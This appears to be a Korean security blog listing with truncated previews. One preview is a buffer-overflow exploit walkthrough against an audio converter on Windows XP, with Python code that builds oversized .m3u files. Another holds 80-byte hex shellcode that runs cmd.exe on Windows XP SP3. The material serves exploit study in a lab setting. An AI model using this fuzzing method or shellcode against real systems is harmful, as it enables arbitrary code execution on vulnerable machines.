취약 프로그램 : https://www.exploit-db.com/exploits/10619/ 실습 환경 : Windows XP sp2 영문판 취약 프로그램 실행 화면 프로그램 설명 : 오디오 파일을 .mp3나 .wav 파일로 컨버팅 해주는 프로그램, 이 프로그램은 .m3u 파일을 실행하는 부분에서 BOF 취약점이 발생한다. 취약점 확인12345dummy = “A”*25000 f = open(“dummy.m3u”, “w”)f.write(dummy)f.close()cs 더미을 25000개 넣고 .m3u 파일을 생성할 경우 파일을 불러오는데는 실패했지만 일단은 돌아간다. 12345dummy = “A”*30000 f = open(“dummy.m3u”, “w”)f.write(dummy)f.close()cs 더미..
보호되어 있는 글입니다.
XP SP3 Kor Local cmd.exe 실행 및 exit() : 80 byte123456"\x55\x8B\xEC\x83\xEC\x44\x33\xC0\xC6\x44\x24\x04\x63\xC6\x44""\x24\x05\x6D\xC6\x44\x24\x06\x64\x88\x44\x24\x07\x6A\x05\x8D""\x44\x24\x08\x50\xC6\x44\x24\x04\xAD\x90\xC6\x44\x24\x05\x23""\x90\xC6\x44\x24\x06\x86\x90\xC6\x44\x24\x07\x7C\x90\x8B\x44""\x24\x04\x90\x90\x90\x90\x90\xFF\xD0\xD0\x6A\x01\xB8\xFA\xCA""\x81\x7C\xFF\xD0\xD0"Colored by Col..